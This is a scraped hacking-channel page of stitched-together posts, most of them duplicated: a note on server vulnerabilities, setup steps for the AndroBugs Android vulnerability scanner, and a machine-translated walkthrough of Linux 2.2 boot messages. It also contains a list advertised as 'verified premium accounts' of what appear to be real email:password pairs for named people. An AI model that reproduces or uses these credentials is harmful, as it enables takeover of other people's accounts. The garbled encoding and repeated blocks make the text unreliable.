2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the siteβs security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.
I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.
Written bY UndercOde
π¦ don t clone our tutorials Without Permissionsπ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 138 likes Β· 13 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Memrise Premium Accounts VERIFIED !
t.me/UndercodeTesting
eric.wupub@gmail.com:Wxf690609 | Username: = XXXFW | Premium: = true
niclas.bornschein@gmail.com:amelie01 | Username: = RhymZ | Premium: = true
kelley.mohr@hotmail.com:December27 | Username: = kelleymohr | Premium: = true
hajduzoli@gmail.com:19 (hajduzoli@gmail.com:19)Balint96 | : Username: = hajduzoli | Premium: = true
harunaniikura@hotmail.fr:Lokinroll10 | Username: = HarunaMizeNiikura65 | Premium: = true
michu2233@gmail.com:reload123 | Username: = Offeris | Premium: = true
mcgdamour@aol.com:BOUBY1ER Username: = LABELETTE1ERE | Premium: = true
csjacobson02@me.com:ShyAnne22 | Username: = csjacobson02 | Premium: = true
rudy2be@gmail.com:4 (rudy2be@gmail.com:4)fnmzx7mb | : Username: = Rudy_EscarriaJr92 | Premium: = true
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Memrise Premium Accounts VERIFIED !
t.me/UndercodeTesting
eric.wupub@gmail.com:Wxf690609 | Username: = XXXFW | Premium: = true
niclas.bornschein@gmail.com:amelie01 | Username: = RhymZ | Premium: = true
kelley.mohr@hotmail.com:December27 | Username: = kelleymohr | Premium: = true
hajduzoli@gmail.com:19 (hajduzoli@gmail.com:19)Balint96 | : Username: = hajduzoli | Premium: = true
harunaniikura@hotmail.fr:Lokinroll10 | Username: = HarunaMizeNiikura65 | Premium: = true
michu2233@gmail.com:reload123 | Username: = Offeris | Premium: = true
mcgdamour@aol.com:BOUBY1ER Username: = LABELETTE1ERE | Premium: = true
csjacobson02@me.com:ShyAnne22 | Username: = csjacobson02 | Premium: = true
rudy2be@gmail.com:4 (rudy2be@gmail.com:4)fnmzx7mb | : Username: = Rudy_EscarriaJr92 | Premium: = true
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows.
fb.com/UndercodeTesting
π¦Features:
> Find security vulnerabilities in an Android app
> Check if the code is missing best practices
> Check dangerous shell commands (e.g. βsuβ)
> Collect Information from millions of apps
> Check the appβs security protection (marked as <Hacker>, designed for app repackaging hacking)
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/AndroBugs/AndroBugs_Framework
2) cd AndroBugs_Framework
3) python androbugs.py -f [APK file]
####To check the usage:####
python androbugs.py -h
π¦Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
>mkdir C:\AndroBugs_Framework
> cd C:\AndroBugs_Framework
> Unzip the latest Windows version of AndroBugs Framework from Windows releases
>Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable
androbugs.exe -h
androbugs.exe -f [APK file]
π¦ Massive Analysis Tool Steup Steps and Usage for Windows
> Complete the Steup Steps and Usage for Windows first
Install the Windows version of MongoDB (https://www.mongodb.org/downloads)
> Install PyMongo library
Config your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg
> Choose your preferred MongoDB management tool (http://mongodb-tools.com/)
> AndroBugs_MassiveAnalysis.exe -h
Example: AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o .\Massive_Analysis_Reports
AndroBugs_ReportByVectorKey.exe -h
Example: AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat
Β» USE FOR LEARN ONLY !!
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows.
fb.com/UndercodeTesting
π¦Features:
> Find security vulnerabilities in an Android app
> Check if the code is missing best practices
> Check dangerous shell commands (e.g. βsuβ)
> Collect Information from millions of apps
> Check the appβs security protection (marked as <Hacker>, designed for app repackaging hacking)
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/AndroBugs/AndroBugs_Framework
2) cd AndroBugs_Framework
3) python androbugs.py -f [APK file]
####To check the usage:####
python androbugs.py -h
π¦Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
>mkdir C:\AndroBugs_Framework
> cd C:\AndroBugs_Framework
> Unzip the latest Windows version of AndroBugs Framework from Windows releases
>Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable
androbugs.exe -h
androbugs.exe -f [APK file]
π¦ Massive Analysis Tool Steup Steps and Usage for Windows
> Complete the Steup Steps and Usage for Windows first
Install the Windows version of MongoDB (https://www.mongodb.org/downloads)
> Install PyMongo library
Config your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg
> Choose your preferred MongoDB management tool (http://mongodb-tools.com/)
> AndroBugs_MassiveAnalysis.exe -h
Example: AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o .\Massive_Analysis_Reports
AndroBugs_ReportByVectorKey.exe -h
Example: AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat
Β» USE FOR LEARN ONLY !!
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Core Technology-Reading Nuclear DiaryReading nuclear diary
full by undercode
t.me/undercodeTesting
> face of nearly 50 m of source code, confusion is inevitable, so I decided to grasp the big picture first, and then cut in some specific points. In this way, the Linux startup process is very important, so I use The dmesg command
looks at the message that is printed when Linux starts. (I think the source file should be in /usr/src/linux/init/main.c) The kernel startup finally reaches start_kernel (in /init/main.c), which is Said that the startup process is running from head.S (arch / i386 / boot /) to main.c (start_kernel). Its role is to complete the settings after the boot and the initialization of the kernel. Wait for the user's input, and call fork to spawn a child process. In order to meet the design requirements of the interactive operating system.
Part 1: Inside Core initialization and startup.
Start the system. When the PC is powered on and starts, the 80X86 processor (CPU) self-tests in real mode and starts executing the code at the physical address 0xFFFF0, which is the starting address of the ROM-BIOS. The BIOS of the PC performs a system self-test and initializes the interrupt vector table to the physical address 0x0. Then load the first sector of the boot device to address 0x7C00 and execute the instructions here. It has nothing to do with linux here, the hardware settings of x86 series are like this.
The Linux kernel itself cannot be bootstrapped, so the role of lilo and loadlin is to load the system kernel. For the principle of lilo, please refer to the readme of lilo. The process from power on to kernel load is: power on-> execute BIOS-> load The first sector-> lilo-> loading the kernel
The initial part of the Linux kernel code is written in assembly language (the file is boot / bootsect.s). (My assembly level is limited, I will not look at it for now), it first moves its own part of the code to the absolute address 0x90000, loads the following 2K code from the boot device to the address 0x90200, and the rest of the kernel is loaded to the address 0x10000. "Loading ..." is displayed when the system is loaded. Then, program control is transferred to another real-mode assembler (boot / Setup.S). Next, this program moves the entire system from address 0x10000 to address 0x1000 and enters protection mode. Program control is transferred to the rest of the system, which is address 0x1000.
The next step is the decompression process of the system kernel. This part of the code is at address 0x1000 (file /Boot/head.S). The program initializes the register and then executes decompress_kernel (). This function is derived from zBoot / inflate.c, zBoot / unzip.c and zBoot / misc.c three files
Loading .... [bootsect.S]
uncompress ..... [decompress_kernel ()]
main.c ---> start_kernel () Start.
Start printk (banner) ;
Linux version 2.2.6 (root @ lance) (gcc version 2.7.2.3) (check the version number of GCC, if the version number of gcc is not enough in /init/main.c, it is not allowed to compile the kernel)
calls init_time () to print out the following:
Detected 199908264 Hz processor.
Then run console_init ()-> drivers / char / tty_io.c * /
Console: colour VGA + 80x25 to
run one Loop, measure MIPS β it is said to use a certain machine instruction cycle to achieve real-time delay.
Calibrating delay loop ... 199.48 BogoMIPS
initial memory / * init_mem * /
Memory: 63396k / 65536k available (848k kernel code, 408k reserved , 856k data
, 28k
/ dquote_init () /
VFS: Diskquotas version dquot_6.4.0 initialized to check
the type of CPU (after 2.2.14 I heard that support for multiple CPUs has been added, I may have to look at it in the future , if I can find a bug of intel then β¦β¦)
CPU: Intel Pentium Pro stepping 09
initial or processor and coprocessor, for older processors, Linux will use software to simulate the coprocessor?
Checking 386/387 coupling ... OK, FPU using exception 16 error reporting.
Check the legitimacy of governance
Checking 'HLT' Instruction ... the OK.
π¦Core Technology-Reading Nuclear DiaryReading nuclear diary
full by undercode
t.me/undercodeTesting
> face of nearly 50 m of source code, confusion is inevitable, so I decided to grasp the big picture first, and then cut in some specific points. In this way, the Linux startup process is very important, so I use The dmesg command
looks at the message that is printed when Linux starts. (I think the source file should be in /usr/src/linux/init/main.c) The kernel startup finally reaches start_kernel (in /init/main.c), which is Said that the startup process is running from head.S (arch / i386 / boot /) to main.c (start_kernel). Its role is to complete the settings after the boot and the initialization of the kernel. Wait for the user's input, and call fork to spawn a child process. In order to meet the design requirements of the interactive operating system.
Part 1: Inside Core initialization and startup.
Start the system. When the PC is powered on and starts, the 80X86 processor (CPU) self-tests in real mode and starts executing the code at the physical address 0xFFFF0, which is the starting address of the ROM-BIOS. The BIOS of the PC performs a system self-test and initializes the interrupt vector table to the physical address 0x0. Then load the first sector of the boot device to address 0x7C00 and execute the instructions here. It has nothing to do with linux here, the hardware settings of x86 series are like this.
The Linux kernel itself cannot be bootstrapped, so the role of lilo and loadlin is to load the system kernel. For the principle of lilo, please refer to the readme of lilo. The process from power on to kernel load is: power on-> execute BIOS-> load The first sector-> lilo-> loading the kernel
The initial part of the Linux kernel code is written in assembly language (the file is boot / bootsect.s). (My assembly level is limited, I will not look at it for now), it first moves its own part of the code to the absolute address 0x90000, loads the following 2K code from the boot device to the address 0x90200, and the rest of the kernel is loaded to the address 0x10000. "Loading ..." is displayed when the system is loaded. Then, program control is transferred to another real-mode assembler (boot / Setup.S). Next, this program moves the entire system from address 0x10000 to address 0x1000 and enters protection mode. Program control is transferred to the rest of the system, which is address 0x1000.
The next step is the decompression process of the system kernel. This part of the code is at address 0x1000 (file /Boot/head.S). The program initializes the register and then executes decompress_kernel (). This function is derived from zBoot / inflate.c, zBoot / unzip.c and zBoot / misc.c three files
Loading .... [bootsect.S]
uncompress ..... [decompress_kernel ()]
main.c ---> start_kernel () Start.
Start printk (banner) ;
Linux version 2.2.6 (root @ lance) (gcc version 2.7.2.3) (check the version number of GCC, if the version number of gcc is not enough in /init/main.c, it is not allowed to compile the kernel)
calls init_time () to print out the following:
Detected 199908264 Hz processor.
Then run console_init ()-> drivers / char / tty_io.c * /
Console: colour VGA + 80x25 to
run one Loop, measure MIPS β it is said to use a certain machine instruction cycle to achieve real-time delay.
Calibrating delay loop ... 199.48 BogoMIPS
initial memory / * init_mem * /
Memory: 63396k / 65536k available (848k kernel code, 408k reserved , 856k data
, 28k
/ dquote_init () /
VFS: Diskquotas version dquot_6.4.0 initialized to check
the type of CPU (after 2.2.14 I heard that support for multiple CPUs has been added, I may have to look at it in the future , if I can find a bug of intel then β¦β¦)
CPU: Intel Pentium Pro stepping 09
initial or processor and coprocessor, for older processors, Linux will use software to simulate the coprocessor?
Checking 386/387 coupling ... OK, FPU using exception 16 error reporting.
Check the legitimacy of governance
Checking 'HLT' Instruction ... the OK.
The POSIX the Conformance Testing by UNIFIX
After calling linux_thread (init, .., .., ) (arch / i386 / kernel / process.c )
to create a run init process.
entered the second phase of user-mode (user_mode) End of start_kerne finally into cpu_idle (arch / i386 / kernel / process.c)
the second part of the device Initialization
Initialize the call to the device. Init () ---> do_basic_init ()-+
pci_init () Initialize the pci device (there is such a ifdef PCI in the main.c file ... need to take a look) Printed below Result:
PCI: PCI BIOS revision 2.10 entry at 0xfd8d1
PCI: Using configuration type 1
PCI: Probing PCI hardware
initialization of Socket, socket_init () (here may be the linux network secret, I will pay attention to it later) -Linux NET4. 0 for Linux 2.2
Based upon Swansea University Computer Society NET3.039
NET4: Unix domain sockets 1.0 for Linux NET4.0.
NET4: Linux TCP / IP 1.0 for NET4.0
IP Protocols: ICMP, UDP, TCP
Starting kswapd v 1.5 kswapd_setup ()
calls device_setup ( )
Detected PS / 2 Mouse Port.
Initialization of sound card
Sound initialization started
Sound initialization complete
initialization floppy drive
Floppy drive (s): fd0 is 1.44M
FDC 0 is a National Semiconductor PC87306
SCSI device initialization
(scsi0) <Adaptec AIC-7880 Ultra SCSI host adapter> found at PCI 13/0
(scsi0) Wide Channel, SCSI ID = 7, 16/255 SCBs
(scsi0) Downloading sequencer code ... 419 instructions downloaded
scsi0: Adaptec AHA274x / 284x / 294x (EISA / VLB / PCI-Fast SCSI) 5.1.10 / 3.2.4
<Adaptec AIC-7880 Ultra SCSI host adapter>
scsi: 1 host.
Vendor: SEAGATE Model: ST32155W Rev: 0596
ype : Direct-Access ANSI SCSI revision: 02
Detected scsi disk sda at scsi0, channel 0, id 0, lun 0
Vendor: SEAGATE Model: ST32155W Rev: 0596
Type: Direct-Access ANSI SCSI revision: 02
Detected scsi disk sdb at scsi0, channel 0, id 1, lun 0
scsi: detected 2 SCSI disks total.
(scsi0: 0: 0: 0) Synchronous at 40.0 Mbyte / sec, offset 8.
SCSI device sda: hdwr sector = 512 bytes. Sectors = 4197405 [2049 MB] [2.0 GB] (scsi0: 0: 1: 0) Synchronous at 40.0 Mbyte / sec, offset 8.
SCSI device sdb: hdwr sector = 512 bytes. Sectors = 4197405 [2049 MB] [2.0 GB] Partition check: sda: sda1 |
sdb: sdb1 sdb2 <sdb5 sdb6> |
install file system filesystem_setup ()
install device driver mount_root ()
VFS: Mounted root (ext2 filesystem) readonly.
Freeing unused kernel memory: 28k freed
Adding Swap: 66540k swap-space (priority -1)
Soundblaster audio driver Copyright (C) by Hannu Savolainen 1993-1996
SB 3.01 detected OK (220)
< ESS ES1688 AudioDrive (rev 11) (3.01)> at 0x220 irq 5 dma 1
YM3812 and OPL-3 driver Copyright (C) by Hannu Savolainen, Rob Hooft 1993-1
996 <Yamaha OPL3> at 0x388
NET4: AppleTalk 0.18 for Linux NET4 .0
eth0: Intel EtherExpress Pro 10/100 at 0xf800, 00: A0: C9: 49: 2F: FF, IRQ 9.
Board assembly 645520-034, Physical connectors present: RJ45
Primary interface chip DP83840 PHY # 1.
DP83840 specific setup, setting register 23 to 8462.
General self-test: passed.
Serial sub-system self-test: passed.
Internal registers self-test: passed.
ROM checksum self-test: passed (0x49caa8d6).
Receiver lock-up workaround activated.
NET4: AppleTalk 0.18 for Linux NET4.0
end do_basic_setup ()
Open ( "/ dev / Console", O_RDWR, 0)
begin / sbin / init (execv (... ))
kernel this boot is completed ...
in this way the system The files needed at startup are clear at a glance. To read the source code in this area, you can probably do this:
Boot / head.S
decompress_kernel (), and then read the corresponding function according to a function block.
In fact, for the entire kernel, you should also interpret the makefile. To be honest, I am very fond of writing makefiles in programming. However, reading the kernel, she is working very hard. Difficult to carry out. Fortunately, with souce insight, we can easily find the definition of functions and constants, which is much more convenient.
After calling linux_thread (init, .., .., ) (arch / i386 / kernel / process.c )
to create a run init process.
entered the second phase of user-mode (user_mode) End of start_kerne finally into cpu_idle (arch / i386 / kernel / process.c)
the second part of the device Initialization
Initialize the call to the device. Init () ---> do_basic_init ()-+
pci_init () Initialize the pci device (there is such a ifdef PCI in the main.c file ... need to take a look) Printed below Result:
PCI: PCI BIOS revision 2.10 entry at 0xfd8d1
PCI: Using configuration type 1
PCI: Probing PCI hardware
initialization of Socket, socket_init () (here may be the linux network secret, I will pay attention to it later) -Linux NET4. 0 for Linux 2.2
Based upon Swansea University Computer Society NET3.039
NET4: Unix domain sockets 1.0 for Linux NET4.0.
NET4: Linux TCP / IP 1.0 for NET4.0
IP Protocols: ICMP, UDP, TCP
Starting kswapd v 1.5 kswapd_setup ()
calls device_setup ( )
Detected PS / 2 Mouse Port.
Initialization of sound card
Sound initialization started
Sound initialization complete
initialization floppy drive
Floppy drive (s): fd0 is 1.44M
FDC 0 is a National Semiconductor PC87306
SCSI device initialization
(scsi0) <Adaptec AIC-7880 Ultra SCSI host adapter> found at PCI 13/0
(scsi0) Wide Channel, SCSI ID = 7, 16/255 SCBs
(scsi0) Downloading sequencer code ... 419 instructions downloaded
scsi0: Adaptec AHA274x / 284x / 294x (EISA / VLB / PCI-Fast SCSI) 5.1.10 / 3.2.4
<Adaptec AIC-7880 Ultra SCSI host adapter>
scsi: 1 host.
Vendor: SEAGATE Model: ST32155W Rev: 0596
ype : Direct-Access ANSI SCSI revision: 02
Detected scsi disk sda at scsi0, channel 0, id 0, lun 0
Vendor: SEAGATE Model: ST32155W Rev: 0596
Type: Direct-Access ANSI SCSI revision: 02
Detected scsi disk sdb at scsi0, channel 0, id 1, lun 0
scsi: detected 2 SCSI disks total.
(scsi0: 0: 0: 0) Synchronous at 40.0 Mbyte / sec, offset 8.
SCSI device sda: hdwr sector = 512 bytes. Sectors = 4197405 [2049 MB] [2.0 GB] (scsi0: 0: 1: 0) Synchronous at 40.0 Mbyte / sec, offset 8.
SCSI device sdb: hdwr sector = 512 bytes. Sectors = 4197405 [2049 MB] [2.0 GB] Partition check: sda: sda1 |
sdb: sdb1 sdb2 <sdb5 sdb6> |
install file system filesystem_setup ()
install device driver mount_root ()
VFS: Mounted root (ext2 filesystem) readonly.
Freeing unused kernel memory: 28k freed
Adding Swap: 66540k swap-space (priority -1)
Soundblaster audio driver Copyright (C) by Hannu Savolainen 1993-1996
SB 3.01 detected OK (220)
< ESS ES1688 AudioDrive (rev 11) (3.01)> at 0x220 irq 5 dma 1
YM3812 and OPL-3 driver Copyright (C) by Hannu Savolainen, Rob Hooft 1993-1
996 <Yamaha OPL3> at 0x388
NET4: AppleTalk 0.18 for Linux NET4 .0
eth0: Intel EtherExpress Pro 10/100 at 0xf800, 00: A0: C9: 49: 2F: FF, IRQ 9.
Board assembly 645520-034, Physical connectors present: RJ45
Primary interface chip DP83840 PHY # 1.
DP83840 specific setup, setting register 23 to 8462.
General self-test: passed.
Serial sub-system self-test: passed.
Internal registers self-test: passed.
ROM checksum self-test: passed (0x49caa8d6).
Receiver lock-up workaround activated.
NET4: AppleTalk 0.18 for Linux NET4.0
end do_basic_setup ()
Open ( "/ dev / Console", O_RDWR, 0)
begin / sbin / init (execv (... ))
kernel this boot is completed ...
in this way the system The files needed at startup are clear at a glance. To read the source code in this area, you can probably do this:
Boot / head.S
decompress_kernel (), and then read the corresponding function according to a function block.
In fact, for the entire kernel, you should also interpret the makefile. To be honest, I am very fond of writing makefiles in programming. However, reading the kernel, she is working very hard. Difficult to carry out. Fortunately, with souce insight, we can easily find the definition of functions and constants, which is much more convenient.